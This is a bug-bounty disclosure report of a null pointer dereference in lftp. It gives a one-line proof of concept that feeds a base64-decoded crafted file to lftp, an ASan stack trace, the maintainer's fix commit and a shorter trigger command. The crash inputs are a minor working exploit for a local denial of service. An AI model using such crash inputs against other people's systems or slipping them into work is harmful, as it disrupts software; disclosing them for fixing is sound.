NULL Pointer Dereference in lavv17/lftp

Valid
Reported on Jun 23rd 2021

✍️ Description

Whilst testing lftp built from commit d67fc1 with Clang 13 (+ASan) on Ubuntu 20.04.2 LTS, we discovered a crafted file which triggers a null pointer dereference and segfault.

🕵️‍♂️ Proof of Concept

echo "aiYgAQEBNA==" | base64 -d > /tmp/file.fuzz && ./lftp -f /tmp/file.fuzz

The above POC produces this ASan stack trace:

==2746997==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000054bdb9 bp 0x7ffca164ada0 sp 0x7ffca164ad80 T0)
==2746997==The signal is caused by a READ memory access.
==2746997==Hint: address points to the zero page.
    #0 0x54bdb9 in xlist<Job>::get_next() const (/root/lftp/src/lftp+0x54bdb9)
    #1 0x550e4a in Job::BuryDoneJobs() (/root/lftp/src/lftp+0x550e4a)
    #2 0x55b8db in CmdExec::Do() (/root/lftp/src/lftp+0x55b8db)
    #3 0x65f042 in SMTask::ScheduleThis() (/root/lftp/src/lftp+0x65f042)
    #4 0x65e8d1 in SMTask::Schedule() (/root/lftp/src/lftp+0x65e8d1)
    #5 0x552cb4 in Job::WaitDone() (/root/lftp/src/lftp+0x552cb4)
    #6 0x531761 in main (/root/lftp/src/lftp+0x531761)
    #7 0x7f0fae7ef0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #8 0x47d22d in _start (/root/lftp/src/lftp+0x47d22d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/root/lftp/src/lftp+0x54bdb9) in xlist<Job>::get_next() const

💥 Impact

This vulnerability is capable of causing a local denial of service by crashing the software.

We have contacted a member of the lavv17/lftp team and are waiting to hear back a month ago
lavv17/lftp maintainer
21 days ago

fixed by https://github.com/lavv17/lftp/commit/ced8ab2f95695aee05424e9aa206cd59a3f90888

Alexander
21 days ago

Maintainer


easy way to trigger the bug: lftp -c 'echo&'

Alexander V. Lukyanov validated this vulnerability 21 days ago
Geeknik Labs has been awarded the disclosure bounty
$25
The fix bounty is now up for grabs
$6.25
Alexander V. Lukyanov confirmed that a fix has been merged on ced8ab 21 days ago
Alexander V. Lukyanov has been awarded the fix bounty
$6.25